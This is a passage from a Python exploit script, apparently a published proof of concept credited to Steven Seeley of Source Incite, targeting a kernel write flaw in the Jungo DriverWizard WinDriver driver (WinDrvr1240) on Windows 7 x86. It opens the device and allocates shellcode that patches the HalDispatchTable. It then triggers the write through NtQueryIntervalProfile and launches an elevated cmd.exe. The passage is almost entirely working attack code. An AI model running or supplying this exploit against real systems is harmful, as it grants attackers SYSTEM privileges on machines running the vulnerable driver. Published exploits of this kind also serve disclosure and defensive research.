print "(+) calling NtQueryIntervalProfile to elevate"
arb = c_ulong(0)
ntdll.NtQueryIntervalProfile(0x1337, byref(arb))
return True
return False
def main():
print "\n\t--[ Jungo DriverWizard WinDriver Kernel Write EoP exploit ]"
print "\t Steven Seeley (mr_me) of Source Incite\r\n"
if release() != "7" and architecture()[0] == "32bit":
print "(-) this exploit will only work for Windows 7 x86."
print " patch the shellcode for other windows versions."
sys.exit(-1)
print "(+) attacking target WinDrvr1240"
GENERIC_READ = 0x80000000
GENERIC_WRITE = 0x40000000
OPEN_EXISTING = 0x3
DEVICE_NAME = "\\\\.\\WinDrvr1240"
dwReturn = c_ulong()
h = kernel32.CreateFileA(DEVICE_NAME, GENERIC_READ | GENERIC_WRITE, 0, None, OPEN_EXISTING, 0, None)
# get the second HalDispatchTable entry[0]
base = get_HALDispatchTable_kernel_address() + 0x4
# create some shellcode that patches the HalDispatchTable[1]
if not alloc_shellcode(0x000000a2, 0x1000, base):
print "(-) cannot allocate shellcode"
sys.exit(-1)
# alloc some memory
in_buffer = 0x41414141
in_size = 0x1000
if not alloc(in_buffer, 0x1000):
print "(-) cannot allocate target buffer"
sys.exit(-1)
if we_can_elevate(h, in_buffer, base):
os.system('cmd.exe')
else:
print "(-) exploit failed!"
if __name__ == '__main__':
main()